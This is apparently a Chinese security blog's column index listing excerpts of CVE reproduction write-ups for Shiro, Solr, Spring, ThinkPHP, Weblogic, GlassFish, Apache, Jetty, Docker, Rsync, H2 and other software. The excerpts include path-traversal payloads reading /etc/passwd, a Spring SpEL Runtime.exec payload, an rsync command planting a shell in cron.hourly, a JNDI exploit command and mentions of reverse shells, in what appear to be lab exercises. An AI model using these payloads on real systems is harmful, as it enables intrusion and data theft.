
服务攻防
文章平均质量分 84
xiaoheizi安全
网络安全知识分享,本人精通Windows开关机以及重启等上档次的高级操作!!!
展开
-
框架漏洞-CVE复现-Apache Shiro+Apache Solr
描述:Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。如果网站的功能是采用框架开发的,那么挖掘功能的漏洞就相当于在挖掘框架自身的漏洞。描述:Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理。原创 2023-07-19 19:57:24 · 588 阅读 · 0 评论 -
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。原创 2023-07-18 16:12:47 · 986 阅读 · 0 评论 -
框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。工具:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令,需要先对命令进行编码。原创 2023-07-16 16:34:39 · 540 阅读 · 0 评论 -
应用协议漏洞-Kibana+Zabbix+远控向日葵
攻击者利用漏洞可以通过Kibana后台中的Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。浏览器搜索该漏洞,发现复现文章也截至在了2022年,2023年无此漏洞复现文章。开启向日葵发现漏洞版本都已经淘汰了,已经无法利用,搜索解决方法让更新版本。fofa获取大量资产,使用脚本测试漏洞,但是脚本只能一次测试单个ip。经过5--6个目标的复现,发现漏洞已经无法利用,官方增加了新的验证。出现几个也都是误报,无法反弹shell。原创 2023-07-16 08:30:21 · 297 阅读 · 0 评论 -
中间件安全-CVE漏洞复现-Weblogic+JBoss+GlassFish
读linux文件:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd。我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。原创 2023-07-16 08:24:17 · 192 阅读 · 0 评论 -
中间件安全-CVE漏洞复现-Docker+Websphere+Jetty
如果拿下的shell是docker容器的,就要进行docker逃逸来获取宿主机shell,因为在docker容器执行命令影响不到宿主机。Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。信息泄露路径:http://目标ip:端口/%u002e/WEB-INF/web.xml。信息泄露路径:http://目标ip:端口/%2e/WEB-INF/web.xml。原创 2023-07-15 19:56:30 · 684 阅读 · 1 评论 -
中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx
将访问路径更改为:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd 因为是Unix系统,所以敏感信息在/etc/passwd下,放包成功获取数据。将访问路径更改为:/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh。点击测试链接,如果测试成功就点击添加。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。原创 2023-07-13 17:32:37 · 390 阅读 · 0 评论 -
应用协议漏洞-Rsync+协议+漏洞批扫
msfconsole是一个强大的接口程序。rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt 查看crontab中的内容,发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务。命令:rsync -av shell rsync://123.58.224.8:22700/src/etc/cron.hourly。漏洞存在,可以读取文件:rsync rsync://123.58.224.8:58725/src/tmp/原创 2023-07-12 08:10:37 · 733 阅读 · 0 评论 -
数据库漏洞-Influxdb+H2database 复现
命令:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A "服务器ip"抓取/query页面的数据包,将Get请求更改为Post请求,在请求中添加令牌,并且添加 POST 请求键值对:db=sample&q=show users。下载漏洞利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。原创 2023-07-10 16:47:54 · 979 阅读 · 0 评论 -
数据库漏洞(未授权访问+RCE)-Mysql+Hadoop
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。如我们在安装使用mysq数据库时,默认情况下就会开启mysql服务和服务默认端口3306。启动漏洞环境,访问漏洞地址http://123.58.224.8:32561 即可看到Hadoop YARN ResourceManager WebUI页面。猜测可能存在Mysql 身份认证绕过漏洞,于是尝试复现漏洞。漏洞利用:反弹shell。原创 2023-07-09 15:51:31 · 1024 阅读 · 0 评论